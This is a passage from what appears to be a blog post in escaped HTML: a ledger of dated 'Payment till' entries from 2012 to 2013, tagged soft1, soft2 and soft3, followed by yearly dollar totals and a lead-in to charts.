89&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-09-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-09 18:05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-09&amp;nbsp; 15787.84 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
88&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-09&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-09 18:05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-09&amp;nbsp; 1525.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
87&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-06-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-06 12:36&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-06&amp;nbsp; 41202.71 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
86&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-06 12:36&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-06&amp;nbsp; 1000.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
85&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-03-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-03 20:16&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-03&amp;nbsp; 15549.01 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
84&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-05-03&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-03 20:15&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-05-03&amp;nbsp; 10260.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
83&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-26-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-26 10:22&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-26&amp;nbsp; 19.98 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
82&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-26-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-26 10:21&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-26&amp;nbsp; 302.14 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
81&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-26-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-26 10:21&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-26&amp;nbsp; 26370.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
78&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-22&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-22 16:30&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-22&amp;nbsp; 1650.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
79&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-22-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-22 16:30&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-22&amp;nbsp; 51337.47 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
80&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-22-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-22 16:30&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-22&amp;nbsp; 50.26 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
77&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-19-s3&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-19 11:42&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-19&amp;nbsp; 312.18 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
76&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-19-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-19 11:42&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-19&amp;nbsp; 9142.67 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
75&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-19-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-19 11:41&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-19&amp;nbsp; 40610.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
74&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-12-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-12 12:52&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-12&amp;nbsp; 13810.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
73&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-12 12:52&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-12&amp;nbsp; 9717.46 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
72&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-10 19:18&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-10&amp;nbsp; 22673.76 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
71&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-08-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-08 14:57&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-08&amp;nbsp; 11020.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
70&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-04-08-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-08 14:56&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-04-08&amp;nbsp; 40822.98 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
69&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-03-27&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-27 03:51&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-27&amp;nbsp; 1819.36 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
68&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-03-22&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-22 14:02&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-22&amp;nbsp; 0.12 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft3&lt;br /&gt;
67&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-03-09-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-09 18:35&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-09&amp;nbsp; 18825.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
66&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-03-09&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-09 18:34&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-09&amp;nbsp; 2749.03 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
65&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-03-06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-06 15:30&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-03-06&amp;nbsp; 72766.77 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
64&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-17-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-17 17:59&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-17&amp;nbsp; 8707.66 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
63&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-17-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-17 17:59&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-17&amp;nbsp; 11145.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
62&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-14-s1&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-14 18:49&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-14&amp;nbsp; 11580.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
61&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-14&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-14 18:45&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-14&amp;nbsp; 33485.69 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
60&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-13&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-13 15:51&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-13&amp;nbsp; 540.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
59&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-12 19:42&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-12&amp;nbsp; 8087.24 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
58&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-11-dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-11 17:13&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-11&amp;nbsp; 475.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
57&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-11&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-11 09:39&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-11&amp;nbsp; 2040.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
56&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-10 19:53&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-10&amp;nbsp; 694.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
54&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-09-peek&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-09 18:27&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-09&amp;nbsp; 1566.83 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
55&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-09&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-09 21:44&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-09&amp;nbsp; 11760.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
53&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-08-123321&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-08 21:06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-08&amp;nbsp; 2369.42 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
52&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-08-dun&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-08 21:05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-08&amp;nbsp; 256.30 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
51&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-08&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-08 13:23&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-08&amp;nbsp; 52957.66 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
50&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-06 12:55&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-06&amp;nbsp; 7087.86 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
49&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-05-bobo&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-05 16:18&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-05&amp;nbsp; 5000.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
48&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-05 08:25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-05&amp;nbsp; 21466.66 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
47&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-02-01&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-01 17:17&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-02-01&amp;nbsp; 5777.70 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
46&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-01-28&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-29 18:23&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-28&amp;nbsp; 23743.88 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
44&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-01-24&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-24 17:55&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-24&amp;nbsp; 83145.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
45&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-01-24-s2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-24 21:32&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-24&amp;nbsp; 26272.27 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft2&lt;br /&gt;
42&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-01-22&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-22 07:59&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-22&amp;nbsp; 24400.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
41&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2013-01-12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-12 17:46&amp;nbsp;&amp;nbsp;&amp;nbsp; 2013-01-12&amp;nbsp; 20200.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
39&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-12-25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-25 13:36&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-25&amp;nbsp; 5515.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
38&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-12-18&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-18 21:31&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-18&amp;nbsp; 13905.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
37&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-12-11&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-11 19:47&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-11&amp;nbsp; 46435.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
36&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-12-05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-05 07:38&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-12-05&amp;nbsp; 27045.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
35&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-11-20&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-20 10:37&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-20&amp;nbsp; 27320.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
34&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-11-16&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-16 11:13&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-16&amp;nbsp; 17440.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
33&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-11-12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-12 18:15&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-12&amp;nbsp; 7705.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
32&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-11-11&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-11 16:03&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-11&amp;nbsp; 2450.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
31&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-11-09&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-09 14:44&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-09&amp;nbsp; 37095.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
30&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-11-07&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-07 16:19&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-11-07&amp;nbsp; 6170.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
29&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-10-16&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-10-16 17:12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-10-16&amp;nbsp; 18435.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
28&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-09-26&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-09-26 09:23&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-09-26&amp;nbsp; 40610.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
27&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-08-14&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-08-14 18:41&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-08-14&amp;nbsp; 24150.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
26&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-08-09&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-08-09 19:10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-08-09&amp;nbsp; 19760.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
25&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-08-02&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-08-02 08:30&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-08-02&amp;nbsp; 24890.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
24&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-27&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-27 18:31&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-27&amp;nbsp; 24677.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
23&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-23&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-23 15:38&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-23&amp;nbsp; 29102.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
22&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-18&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-18 15:41&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-18&amp;nbsp; 11528.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
21&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-17&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-17 00:26&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-17&amp;nbsp; 25035.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
20&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-12 19:11&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-12&amp;nbsp; 4600.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
19&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-10 15:32&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-10&amp;nbsp; 5940.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
18&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-05&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-05 13:39&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-05&amp;nbsp; 4435.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
17&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-07-01&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-01 13:25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-07-01&amp;nbsp; 835.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
16&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-06-27&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-27 17:13&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-27&amp;nbsp; 9905.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
14&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-06-19&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-19 16:47&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-19&amp;nbsp; 3570.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
15&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-06-19-2&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-21 20:53&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-19&amp;nbsp; 17350.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
13&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-06-06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-06 18:34&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-06-06&amp;nbsp; 3365.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
12&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-05-25&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-05-25 12:06&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-05-25&amp;nbsp; 4480.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
11&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-05-18&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-05-18 22:35&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-05-18&amp;nbsp; 9725.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
10&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-05-10&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-05-10 21:04&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-05-10&amp;nbsp; 8575.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
9&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-04-26&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-05-03 14:46&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-04-26&amp;nbsp; 3980.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
8&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-04-19&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-04-26 09:55&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-04-19&amp;nbsp; 9210.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
7&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-04-12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-04-20 19:56&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-04-12&amp;nbsp; 8875.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
5&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-04-02&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-04-02 13:48&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-04-02&amp;nbsp; 12800.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
4&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-03-26&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-03-26 19:32&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-03-26&amp;nbsp; 2755.00 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
2&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-03-16&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-03-16 20:34&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-03-16&amp;nbsp; 2212.25 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;br /&gt;
1&amp;nbsp;&amp;nbsp;&amp;nbsp; Payment till 2012-03-12&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-03-12 14:19&amp;nbsp;&amp;nbsp;&amp;nbsp; 2012-03-12&amp;nbsp; 4753.17 $&amp;nbsp;&amp;nbsp;&amp;nbsp; soft1&lt;/div&gt;&lt;p&gt;The numbers are kinda crazy, so let&#39;s breakdown that in charts.&lt;br /&gt;&lt;br /&gt;If we total everything up and regroup by year, we get:&lt;/p&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;2012:&amp;nbsp;&amp;nbsp;$526632.42 → $526.63K&lt;/li&gt;&lt;li&gt;2013:&amp;nbsp;&amp;nbsp;$1440845.73&amp;nbsp;→ $1.44M&lt;/li&gt;&lt;li&gt;2014:&amp;nbsp;&amp;nbsp;$46995.00&amp;nbsp;→ $46.99K&lt;/li&gt;&lt;/ul&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
